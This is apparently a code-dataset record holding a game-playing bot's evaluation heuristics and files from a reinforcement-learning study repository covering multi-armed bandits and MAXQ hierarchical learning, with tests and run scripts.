3\n\n if count_plyr == 3 and empty == 1:\n return (tent_x, tent_y)\n\n return (-1, -1)\n\n\n def utility_get(self, board, player_flag, opp_flag):\n gain = 0\n utility_values_block = []\n for i in range(16):\n utility_values_block.append(0)\n\n for i in range(16):\n utility_values_block[i] = self.calc_utility(board, i, player_flag, opp_flag)/1000.0\n\n #DIAMOND1\n p, pos, neg = 0, 0, 0\n p += utility_values_block[4]\n if board.block_status[1][0] == player_flag:\n pos = pos + 1\n elif board.block_status[1][0] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[1]\n if board.block_status[0][1] == player_flag:\n pos = pos + 1\n elif board.block_status[0][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[9]\n if board.block_status[2][1] == player_flag:\n pos = pos + 1\n elif board.block_status[2][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[6]\n if board.block_status[1][2] == player_flag:\n pos = pos + 1\n elif board.block_status[1][2] == opp_flag:\n neg = neg + 1\n\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n #DIAMOND2\n p, pos, neg = 0, 0, 0\n\n p += utility_values_block[5]\n if board.block_status[1][1] == player_flag:\n pos = pos + 1\n elif board.block_status[1][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[2]\n if board.block_status[0][2] == player_flag:\n pos = pos + 1\n elif board.block_status[0][2] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[10]\n if board.block_status[2][2] == player_flag:\n pos = pos + 1\n elif board.block_status[2][2] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[7]\n if board.block_status[1][3] == player_flag:\n pos = pos + 1\n elif board.block_status[1][3] == opp_flag:\n neg = neg + 1\n\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n #DIAMOND3\n p, pos, neg = 0, 0, 0\n\n p += utility_values_block[8]\n if board.block_status[2][0] == player_flag:\n pos = pos + 1\n elif board.block_status[2][0] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[5]\n if board.block_status[1][1] == player_flag:\n pos = pos + 1\n elif board.block_status[1][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[13]\n if board.block_status[3][1] == player_flag:\n pos = pos + 1\n elif board.block_status[3][1] == opp_flag:\n 
neg = neg + 1\n\n p += utility_values_block[10]\n if board.block_status[2][2] == player_flag:\n pos = pos + 1\n elif board.block_status[2][2] == opp_flag:\n neg = neg + 1\n\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n #DIAMOND4\n p, pos, neg = 0, 0, 0\n\n p += utility_values_block[9]\n if board.block_status[2][1] == player_flag:\n pos = pos + 1\n elif board.block_status[2][1] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[6]\n if board.block_status[1][2] == player_flag:\n pos = pos + 1\n elif board.block_status[1][2] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[14]\n if board.block_status[3][2] == player_flag:\n pos = pos + 1\n elif board.block_status[3][2] == opp_flag:\n neg = neg + 1\n\n p += utility_values_block[11]\n if board.block_status[2][3] == player_flag:\n pos = pos + 1\n elif board.block_status[2][3] == opp_flag:\n neg = neg + 1\n\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n for i in range(4):\n p, pos, neg = 0, 0, 0\n for j in range(4):\n p += utility_values_block[j*4+i]\n if board.block_status[j][i] == player_flag:\n pos = pos + 1\n elif board.block_status[j][i] == opp_flag:\n neg = neg + 1\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n for i in range(4):\n p, pos, neg = 0, 0, 0\n for j in range(4):\n p += utility_values_block[i*4+j]\n if board.block_status[i][j] == player_flag:\n pos = pos + 1\n elif board.block_status[i][j] == opp_flag:\n neg = neg + 1\n gain = gain + (10 * self.utility_matrix[5*pos+neg]) + self.calc_imp(p)\n\n count_plyr_block = count_opp_block = 0\n val1, val2 = 50 , 20\n\n for i in range(4):\n for j in range(4):\n if board.block_status[i][j] == player_flag:\n count_plyr_block += 1\n elif board.block_status[i][j] == opp_flag:\n count_opp_block += 1\n\n if count_opp_block > self.count_opp and count_plyr_block < self.count_plyr:\n gain-=val1\n\n elif (count_plyr_block - self.count_plyr) < (count_opp_block - self.count_opp) and count_plyr_block > self.count_plyr:\n gain-=val2\n\n elif count_opp_block == self.count_opp and self.count_plyr < count_plyr_block:\n gain+=val1\n\n return gain\n\n\n def calc_utility(self, board, board_num, player_flag, opp_flag):\n gain , board_x, board_y = 0, (board_num/4)*4, (board_num%4)*4\n\n for i in range(board_x, board_x + 4):\n pos, neg = 0, 0\n for j in range(board_y, board_y + 4):\n if board.board_status[i][j] == opp_flag:\n neg = neg + 1\n elif board.board_status[i][j] == player_flag:\n pos = pos + 1\n gain += self.utility_matrix[5*pos+neg]\n\n for j in range(board_y, board_y + 4):\n pos, neg = 0, 0\n for i in range(board_x, board_x + 4):\n if board.board_status[i][j] == opp_flag:\n neg = neg + 1\n elif board.board_status[i][j] == player_flag:\n pos = pos + 1\n gain += self.utility_matrix[5*pos+neg]\n\n #DIAMOND1\n pos, neg = 0, 0\n\n if board.board_status[board_x + 1][board_y + 0] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 0] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 0][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 0][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 2][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 1][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 2] == opp_flag:\n neg = neg + 1\n\n gain += 
self.utility_matrix[5*pos+neg]\n\n\n #DIAMOND2\n pos, neg = 0, 0\n\n if board.board_status[board_x + 1][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 0][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 0][board_y + 2] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 2][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 2] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 1][board_y + 3] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 3] == opp_flag:\n neg = neg + 1\n\n gain += self.utility_matrix[5*pos+neg]\n\n\n #DIAMOND3\n pos, neg = 0, 0\n\n if board.board_status[board_x + 2][board_y + 0] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 0] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 1][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 3][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 3][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 2][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 2] == opp_flag:\n neg = neg + 1\n\n gain += self.utility_matrix[5*pos+neg]\n\n #DIAMOND4\n pos, neg = 0, 0\n\n if board.board_status[board_x + 2][board_y + 1] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 1] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 1][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 1][board_y + 2] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 3][board_y + 2] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 3][board_y + 2] == opp_flag:\n neg = neg + 1\n\n if board.board_status[board_x + 2][board_y + 3] == player_flag:\n pos = pos + 1\n elif board.board_status[board_x + 2][board_y + 3] == opp_flag:\n neg = neg + 1\n\n gain += self.utility_matrix[5*pos+neg]\n\n plyr_flag = player_flag\n op_flag = 'o' if player_flag == 'x' else 'x'\n i, j, tempx, tempy = 0, 0, 0, 0\n\n hor, ver = [], []\n for p in range(4):\n temp_hor = []\n for q in range(4):\n temp_hor.append([p,q])\n hor.append(temp_hor)\n\n for q in range(4):\n temp_ver = []\n for p in range(4):\n temp_ver.append([p,q])\n ver.append(temp_ver)\n lim = 10\n\n for hor_line in hor:\n count_plyr_hor, count_opp_hor, count_plyr_ver, count_opp_ver = 0, 0, 0, 0\n for ver_line in ver:\n count_plyr_hor, count_opp_hor, count_plyr_ver, count_opp_ver = 0, 0, 0, 0\n\n for var in ver_line:\n if plyr_flag == board.board_status[board_x+var[0]][board_y+var[1]]:\n count_plyr_ver+=1\n elif op_flag == board.board_status[board_x+var[0]][board_y+var[1]]:\n count_opp_ver+=1\n y_cord = var[1]\n\n for var in hor_line:\n if plyr_flag == board.board_status[board_x+var[0]][board_y+var[1]]:\n count_plyr_hor+=1\n elif op_flag == board.board_status[board_x+var[0]][board_y+var[1]]:\n count_opp_hor+=1\n x_cord = var[0]\n\n a, b = board_x+x_cord, board_y+y_cord\n\n if board.board_status[a][b] == plyr_flag and count_plyr_hor == 3 and count_opp_ver == 2 and count_plyr_ver == 0 and count_opp_hor == 0:\n gain += lim\n\n if board.board_status[a][b] == plyr_flag and count_opp_hor == 2 and count_plyr_ver == 3 and count_opp_ver == 0 and 
count_plyr_hor == 0:\n gain += lim\n\n return gain\n\n def calc_imp(self, util):\n limit1, limit2 = 4, -4\n for i in range(-4,-1):\n if (util >= i and util < i+1):\n factr = pow(10, abs(i)-2)\n ret = (util-i-1)*9*factr - factr\n\n for i in range(1,4):\n if (util >= i and util < i+1):\n factr = pow(10, abs(i)-1)\n ret = (util-i)*9*factr + factr\n\n if abs(util) < 1 or util == -1:\n ret = util\n\n if util < limit2:\n factr = pow(10,3)\n ret = (util-limit2)*9*factr - factr\n\n if util >= limit1:\n factr = pow(10,3)\n ret = (util-limit1)*9*factr + factr\n\n return ret\n" } ]
1
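The game-bot source in the record above runs depth-limited minimax with alpha-beta pruning and a wall-clock cutoff over 4x4 sub-boards. A minimal, self-contained sketch of the alpha-beta pattern that code follows, with the board specifics stripped out (the Node type and the leaf scores here are hypothetical, not the repo's board/move structures):

import math
from dataclasses import dataclass
from typing import List

@dataclass
class Node:
    score: float = 0.0             # static evaluation, used at the leaves
    children: List["Node"] = None  # None marks a leaf

def alphabeta(node, depth, alpha, beta, maximizing):
    if depth == 0 or not node.children:
        return node.score
    if maximizing:
        best = -math.inf
        for child in node.children:
            best = max(best, alphabeta(child, depth - 1, alpha, beta, False))
            alpha = max(alpha, best)
            if alpha >= beta:  # beta cutoff: the minimizer will avoid this branch
                break
        return best
    best = math.inf
    for child in node.children:
        best = min(best, alphabeta(child, depth - 1, alpha, beta, True))
        beta = min(beta, best)
        if alpha >= beta:      # alpha cutoff: the maximizer will avoid this branch
            break
    return best

leaves = lambda *vals: [Node(score=v) for v in vals]
root = Node(children=[Node(children=leaves(3, 5)), Node(children=leaves(2, 9))])
print(alphabeta(root, 2, -math.inf, math.inf, True))  # prints 3; the 9-leaf is pruned

The repo's version additionally threads (row, col) bookkeeping and a timeout through the recursion; those are orthogonal to the pruning itself.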
vladhc/rl-book
https://github.com/vladhc/rl-book
dffecdcaa0c9757807b5c2e48558b16e3ef862f4
070fba244a4ce46f9b39f0e112af66c7a4fc47bc
ca8ec1648207e4b88f97a2b85f9d56ffc1aafd41
refs/heads/master
2020-04-23T17:56:16.904357
2019-03-27T21:44:14
2019-03-27T21:44:14
171349590
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6486486196517944, "alphanum_fraction": 0.6486486196517944, "avg_line_length": 6.400000095367432, "blob_id": "50889187308b36a8edbf8b96039ad89c733dddad", "content_id": "e908cea08c808083d0541d8e6014ba5135494793", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 37, "license_type": "no_license", "max_line_length": 14, "num_lines": 5, "path": "/hierarchical-with-maxq-decomposition/run.sh", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eu\n\npython main.py\n" }, { "alpha_fraction": 0.6596638560295105, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 20.636363983154297, "blob_id": "f7aa780f0959f4bff7485371f5cfa20f9ba8686a", "content_id": "347290d1756a2188890f568eda80521e1247c2ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 238, "license_type": "no_license", "max_line_length": 53, "num_lines": 11, "path": "/ch2-multi-armed-bandits/run.sh", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eux\n\nrm -rf output_dir\n\npython main.py --epsilon 0.00 ./output_dir/epsilon_0\npython main.py --epsilon 0.01 ./output_dir/epsilon_01\npython main.py --epsilon 0.1 ./output_dir/epsilon_10\n\ntensorboard --logdir ./output_dir\n" }, { "alpha_fraction": 0.4725111424922943, "alphanum_fraction": 0.5156017541885376, "avg_line_length": 29.590909957885742, "blob_id": "adccde8ba9d7cfecb901b23d2a5b2bd53b221a8c", "content_id": "e436885ab5ee55c64da61aa002151e84bb285c7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 677, "license_type": "no_license", "max_line_length": 62, "num_lines": 22, "path": "/hierarchical-with-maxq-decomposition/rl/tests/test_graph.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "from unittest import TestCase\nimport rl\n\nclass TestGraph(TestCase):\n\n def testValueCompositeAction(self):\n bottom = rl.Task(\"↓\", 0)\n right = rl.Task(\"→\", 0)\n root = rl.Task(\"root\", term_predicate=lambda x: False)\n root += bottom\n root += right\n graph = rl.Graph(root)\n\n graph.set_v(bottom, (0, 0), -1)\n graph.set_v(right, (0, 0), -100)\n graph.set_c(root, (0, 0), bottom, 0.3)\n\n # V = Q(root, state, best_action(s))\n # best_action((0, 0)) = bottom\n # V = V(bottom, (0, 0)) + C(root, (0,0), bottom)\n # V = -1 + 0.3 = -0.7\n self.assertEqual(graph.get_v(root, (0, 0)), -0.7)\n" }, { "alpha_fraction": 0.7878788113594055, "alphanum_fraction": 0.7878788113594055, "avg_line_length": 48.5, "blob_id": "cc35b7fe33d34b5a98298b910d7ba97fe922350a", "content_id": "da98f943c6bcc1e68a9d9afc77173ff00b339ef2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 99, "license_type": "no_license", "max_line_length": 67, "num_lines": 2, "path": "/hierarchical-with-maxq-decomposition/taxi/__init__.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "from .evaluate import evaluate\nfrom .evaluate import print_best_actions, print_q, print_c, print_v\n" }, { "alpha_fraction": 0.5060483813285828, "alphanum_fraction": 0.5262096524238586, "avg_line_length": 22.619047164916992, "blob_id": "d87cdb28c07d2591f549a7433f9ea0f14e8c77b7", "content_id": "4b5d123179cd02f3cc458a00897468b102dd9f21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 496, "license_type": "no_license", "max_line_length": 84, "num_lines": 
21, "path": "/ch2-multi-armed-bandits/run-optimistic-initial.sh", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eux\n\nrm -rf output_dir\n\nSTEPS=50\nARMS=10\n\npython main.py --steps $STEPS \\\n --arms $ARMS \\\n --epsilon 0.1 \\\n --init_q 0 \\\n --optimizer recency_weighted ./output_dir/recency_weighted\npython main.py --steps $STEPS \\\n --arms $ARMS \\\n --epsilon 0.1 \\\n --init_q 5 \\\n --optimizer recency_weighted ./output_dir/recency_weighted_optimistic\n\ntensorboard --logdir ./output_dir\n" }, { "alpha_fraction": 0.5635359287261963, "alphanum_fraction": 0.5643251538276672, "avg_line_length": 24.85714340209961, "blob_id": "6e5ad694099fec46154bf0021d6735196881fe32", "content_id": "26a86912f306bcb3f7438b00ee1bcaae0d2d365a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1267, "license_type": "no_license", "max_line_length": 69, "num_lines": 49, "path": "/hierarchical-with-maxq-decomposition/rl/task.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "class Task:\n\n def __init__(\n self,\n name,\n primitive_action=None,\n params=None,\n state_tr=lambda state: state,\n term_predicate=lambda state: True):\n self.name = name\n\n # For the composite actions\n self._actions = []\n self._params = params\n self._state_tr = state_tr\n self._term_predicate = term_predicate\n\n # For the primitive actions\n self._primitive_action = primitive_action\n\n def __iadd__(self, action):\n self._actions.append(action)\n return self\n\n def get(self, name, params=None):\n for action in self._actions:\n if action.name == name and action.get_params() == params:\n return action\n\n def get_params(self):\n return self._params\n\n def transform_state(self, state):\n return self._state_tr(state)\n\n def is_primitive(self):\n return len(self._actions) == 0\n\n def get_primitive(self):\n return self._primitive_action\n\n def get_actions(self):\n return self._actions\n\n def is_done(self, state):\n if self.is_primitive():\n return True\n state = self.transform_state(state)\n return self._term_predicate(state)\n" }, { "alpha_fraction": 0.5642135739326477, "alphanum_fraction": 0.5707070827484131, "avg_line_length": 26.176469802856445, "blob_id": "970dc2ec495e326843d1d266dea2088f41b925c8", "content_id": "205dbc70f65641a2a2ac2013e487647fa5e933e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1386, "license_type": "no_license", "max_line_length": 82, "num_lines": 51, "path": "/hierarchical-with-maxq-decomposition/rl/policy.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "import numpy as np\n\n\ndef get_action(graph, stack, state, epsilon=0.0):\n while True:\n assert len(stack) > 0\n task, params, *_ = stack[-1]\n if task.is_done(state):\n stack.pop()\n else:\n break\n while True:\n task, *_ = stack[-1]\n if task.is_primitive():\n break\n # Evaluate next action\n next_task = _policy(graph, task, state, epsilon)\n stack.append((next_task, 0, state))\n action, *_ = stack[-1] # Primitive action\n\n # increase tick of every action on stack\n for i in range(len(stack)):\n task, ticks, state = stack[i]\n ticks += 1\n stack[i] = (task, ticks, state)\n\n return action.get_primitive(), stack\n\n\ndef print_stack(stack):\n for i, record in enumerate(stack):\n action, ticks, _ = record\n print(\"{}. 
{}({}): {}\".format(i, action.name, action.get_params(), ticks))\n\n\ndef _policy(graph, task, state, epsilon):\n best_action = graph.get_best_action(task, state)\n if np.random.uniform() > epsilon:\n return best_action\n\n actions = filter(\n lambda a: a.is_primitive() or not a.is_done(state),\n task.get_actions())\n actions = list(actions)\n actions.remove(best_action)\n\n if len(actions) == 0:\n return best_action\n\n rand_idx = np.random.choice(len(actions))\n return actions[rand_idx]\n" }, { "alpha_fraction": 0.4357026517391205, "alphanum_fraction": 0.4845360815525055, "avg_line_length": 29.71666717529297, "blob_id": "74ecdb3c07e360de73f2b7d7d98fede25ca4c10d", "content_id": "1ad8f3c9dfd44b7366d7112b0c05677bb94d4ab3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1847, "license_type": "no_license", "max_line_length": 66, "num_lines": 60, "path": "/hierarchical-with-maxq-decomposition/rl/tests/test_optimizer.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "from unittest import TestCase\nimport rl\n\n\nclass TestOptimizer(TestCase):\n\n def testPrimitiveAction(self):\n a = rl.Task(\"↓\", 0)\n root = rl.Task(\"root\", term_predicate=lambda x: False)\n root += a\n graph = rl.Graph(root)\n\n optimizer = rl.Optimizer(graph, learning_rate=0.5)\n state = (0, 0)\n next_state = (0, 1)\n\n for v in [-0.5, -0.75, -0.875]:\n stack = [\n (root, 1, state),\n (a, 1, state),\n ]\n optimizer.optimize(stack, next_state, False)\n self.assertEqual(graph.get_v(a, state), v)\n\n def testCompositeAction(self):\n down = rl.Task(\"↓\", 0)\n root = rl.Task(\"root\")\n root += down\n graph = rl.Graph(root)\n\n optimizer = rl.Optimizer(\n graph,\n learning_rate=0.75,\n discount_factor=1.0)\n state0 = (0, 0)\n state = (0, 3)\n next_state = (0, 4)\n\n graph.set_v(down, state, -1.0)\n graph.set_v(down, next_state, -0.25)\n graph.set_c(root, state, down, 1.0)\n graph.set_c(root, next_state, down, 2.0)\n\n stack = [\n (root, 4, state0),\n (down, 1, state),\n ]\n\n optimizer.optimize(stack, next_state, False)\n\n # Parent task is finished => V of the primitive action:\n # target = 0.0 => 0.25 * -1.0 + 0.75 * 0.0 = -0.25\n self.assertEqual(graph.get_v(down, state), -0.25)\n\n # target C(root, state, down) = V(root, next_state) =\n # = Q(root, next_state, down) =\n # = V(down, next_state) + C(root, next_state, down) =\n # = -0.25 + 2.0 = 1.75\n # C(root, state, down) = 0.25 * 1.0 + 0.75 * 1.75 = 1.5625\n self.assertEqual(graph.get_c(root, state, down), 1.5625)\n" }, { "alpha_fraction": 0.8055555820465088, "alphanum_fraction": 0.8055555820465088, "avg_line_length": 35, "blob_id": "9620254bdd68712b9231db33cf5c645db506c199", "content_id": "cf1f845e5670abaf0491e2406ab283684038e209", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 43, "num_lines": 4, "path": "/hierarchical-with-maxq-decomposition/rl/__init__.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "from .task import Task\nfrom .graph import get_default_graph, Graph\nfrom .policy import get_action, print_stack\nfrom .optimizer import Optimizer\n" }, { "alpha_fraction": 0.6023502945899963, "alphanum_fraction": 0.6031084060668945, "avg_line_length": 31.567901611328125, "blob_id": "87d98144148b2e8d84f6353c45617659d00f4deb", "content_id": "4fa92a6322353dde8d058a49bda1abdd12e08a93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 2642, "license_type": "no_license", "max_line_length": 95, "num_lines": 81, "path": "/hierarchical-with-maxq-decomposition/rl/graph.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "from .task import Task\nfrom collections import defaultdict\n\n\nclass Graph:\n\n def __init__(self, root):\n self._v = defaultdict(float) # (primitiveAction, state) → value\n self._c = defaultdict(float) # (action, state, subAction) → completition\n self._root = root\n self._prev_default_graph = None\n\n def root(self):\n return self._root\n\n def __enter__(self):\n global _default_graph\n self._prev_default_graph = _default_graph\n _default_graph = self\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n global _default_graph\n _default_graph = self._prev_default_graph\n\n def get_v(self, action, state):\n if action.is_primitive():\n state_tr = action.transform_state(state)\n return self._v[(action.name, state_tr)]\n best_action = self.get_best_action(action, state)\n return self.get_q(action, state, best_action)\n\n def get_q(self, action, state, child_action):\n c = self.get_c(action, state, child_action)\n v = self.get_v(child_action, state)\n return v + c\n\n def set_v(self, action, state, v):\n assert action.is_primitive()\n state_tr = action.transform_state(state)\n self._v[(action.name, state_tr)] = v\n\n def get_c(self, parent_action, state, action):\n assert isinstance(parent_action, Task)\n assert isinstance(action, Task)\n assert parent_action.get_actions().index(action) != -1\n state_tr = action.transform_state(state)\n return self._c[(parent_action.name, state_tr, action.name)]\n\n def set_c(self, parent_action, state, action, c):\n assert isinstance(parent_action, Task)\n assert isinstance(action, Task)\n assert parent_action.get_actions().index(action) != -1\n state_tr = action.transform_state(state)\n self._c[(parent_action.name, state_tr, action.name)] = c\n\n def get_best_action(self, parent_action, state):\n assert not parent_action.is_primitive()\n best_action = None\n best_v = -float('inf')\n\n actions = filter(\n lambda a: a.is_primitive() or not a.is_done(state),\n parent_action.get_actions())\n\n for action in actions:\n v = self.get_q(parent_action, state, action)\n if v > best_v:\n best_action = action\n best_v = v\n\n assert best_action is not None, \"No best action for task {}\".format(parent_action.name)\n return best_action\n\n\n_default_graph = None\n\n\ndef get_default_graph():\n global _default_graph\n return _default_graph\n" }, { "alpha_fraction": 0.5286320447921753, "alphanum_fraction": 0.5360551476478577, "avg_line_length": 32.88024139404297, "blob_id": "bde6b9d98d3c58f1d89d4ef55072cbc29700859e", "content_id": "019b4c43f3d08fa54049ea7613db605686a8acf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5658, "license_type": "no_license", "max_line_length": 83, "num_lines": 167, "path": "/ch2-multi-armed-bandits/main.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "import numpy as np\nimport tensorflow as tf\nimport argparse\n\n\ndef create_graph(params, delta_graph):\n tf.reset_default_graph()\n\n arms_count = params.arms\n games_count = params.games\n shape = (games_count, arms_count)\n\n q = tf.get_variable(\n 'q',\n shape,\n initializer=tf.initializers.random_normal)\n q_estimated = tf.Variable(\n np.ones(shape, dtype=np.float32) * params.init_q,\n name='q_estimated')\n n = tf.get_variable(\n 'n',\n shape,\n dtype=tf.int32,\n 
initializer=tf.ones_initializer)\n\n    with tf.variable_scope('action_selection'):\n        greedy_action = tf.argmax(\n            q_estimated,\n            axis=1,\n            name='greedy_action',\n            output_type=tf.int32)\n        random_action = tf.random_uniform(\n            shape=(games_count,),\n            maxval=arms_count,\n            dtype=tf.int32,\n            name='random_action')\n        epsilon = tf.constant(params.epsilon, name='epsilon')\n        selected_action = tf.where(\n            tf.random_uniform(shape=(games_count,), maxval=1.0) < epsilon,\n            random_action,\n            greedy_action,\n            name='selected_action')\n\n    mask = tf.one_hot(selected_action,\n                      depth=arms_count,\n                      dtype=tf.float32,\n                      name='mask')\n\n    with tf.variable_scope('reward'):\n        reward = (tf.random_normal(shape) + q) * mask\n\n    with tf.variable_scope('update_q'):\n        error = reward - q_estimated * mask\n        inc_n = tf.assign_add(\n            n,\n            tf.cast(mask, tf.int32),\n            name='increment_n')\n        inc_n = tf.cast(inc_n, tf.float32)\n        delta = delta_graph(params, error, inc_n)\n        train_op = tf.assign_add(\n            q_estimated,\n            delta,\n            name='update_q_estimated')\n\n    with tf.variable_scope('stat'):\n        # Optimal action ratio\n        optimal_action = tf.argmax(\n            q,\n            axis=1,\n            output_type=tf.int32,\n            name='optimal_action')\n        is_optimal_action = tf.equal(selected_action, optimal_action)\n        optimal_action_ratio = tf.reduce_mean(\n            tf.cast(is_optimal_action, tf.float32))\n        tf.summary.scalar('optimal_action_ratio', optimal_action_ratio)\n\n        # Average reward\n        avg_reward = tf.reduce_mean(tf.reduce_sum(reward, axis=1))\n        tf.summary.scalar('avg_reward', avg_reward)\n\n        # True error\n        true_error = tf.reduce_sum((q_estimated - q) * mask, axis=1)\n        tf.summary.histogram('true_error', true_error)\n        tf.summary.scalar('avg_true_error', tf.reduce_mean(true_error))\n\n        # Error\n        square_error = tf.pow(tf.reduce_sum(error, axis=1), 2, name='square_error')\n        tf.summary.scalar('avg_square_error', tf.reduce_mean(square_error))\n        tf.summary.histogram('square_error', square_error)\n\n        tf.summary.histogram('reward', tf.reduce_sum(reward, axis=1))\n        tf.summary.histogram('delta', tf.reduce_sum(delta, axis=1))\n        tf.summary.histogram('q_estimated', q_estimated)\n\n    summaries = tf.summary.merge_all()\n\n    return summaries, train_op\n\n\ndef run_experiment(params, optimizer):\n\n    summaries, train_op = create_graph(params, optimizer)\n\n    with tf.Session() as sess:\n        writer = tf.summary.FileWriter(params.output_dir, sess.graph)\n        sess.run(tf.global_variables_initializer())\n\n        for step in range(params.steps):\n            summ, _ = sess.run([summaries, train_op])\n            writer.add_summary(summ, global_step=step)\n\n        writer.close()\n\n\ndef delta_sample_average(params, error, n):\n    return error / n\n\n\ndef recency_weighted(params, error, n):\n    return error * params.alpha\n\n\noptimizers = {\n    'sample_average': delta_sample_average,\n    'recency_weighted': recency_weighted,\n}\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\n        description='Run multi-armed bandit experiment')\n    parser.add_argument('--epsilon',\n                        type=float,\n                        help='Ratio of exploration actions')\n    parser.add_argument('--games',\n                        type=int,\n                        default=2000,\n                        help='Number of games')\n    parser.add_argument('--steps',\n                        type=int,\n                        default=1000,\n                        help='Number of steps for each game')\n    parser.add_argument('--arms',\n                        type=int,\n                        default=10,\n                        help='Number of bandit arms')\n    parser.add_argument('--optimizer', type=str,\n                        default='sample_average',\n                        nargs='?',\n                        help='''Function for delta Q calculation. 
Possible\n values: sample_average, recency_weighted.''')\n parser.add_argument('--alpha', type=float,\n default=0.1,\n nargs='?',\n help='Alpha parameter for recency_weighted optimizer')\n parser.add_argument('--init_q', type=float,\n default=0.0,\n nargs='?',\n help='Initial value of Q')\n parser.add_argument('output_dir', type=str,\n metavar='output_dir',\n help='Statistics directory for Tensorboard')\n args = parser.parse_args()\n\n optimizer = optimizers[args.optimizer]\n\n run_experiment(args, optimizer)\n" }, { "alpha_fraction": 0.5341529846191406, "alphanum_fraction": 0.5469034314155579, "avg_line_length": 34.41935348510742, "blob_id": "ae6e27940e53dbb7c1efaad1e6d5870fbaef8872", "content_id": "abd86dfa2ca3ed0e514bcb7e4b1c6a3fe4303231", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2196, "license_type": "no_license", "max_line_length": 95, "num_lines": 62, "path": "/hierarchical-with-maxq-decomposition/rl/optimizer.py", "repo_name": "vladhc/rl-book", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom .graph import get_default_graph\n\nepsilon = 0.00000001\n\n\ndef _move(x, target, alpha, episode, max_episodes):\n global epsilon\n k = min(1.0, float(episode) / float(max_episodes))\n alpha = max(epsilon, alpha * (1.0 - k))\n return (1.0 - alpha) * x + alpha * target\n\n\nclass Optimizer:\n\n def __init__(\n self,\n graph=None,\n learning_rate=0.02,\n discount_factor=0.9,\n steps=1000):\n if graph is None:\n graph = get_default_graph()\n self._graph = 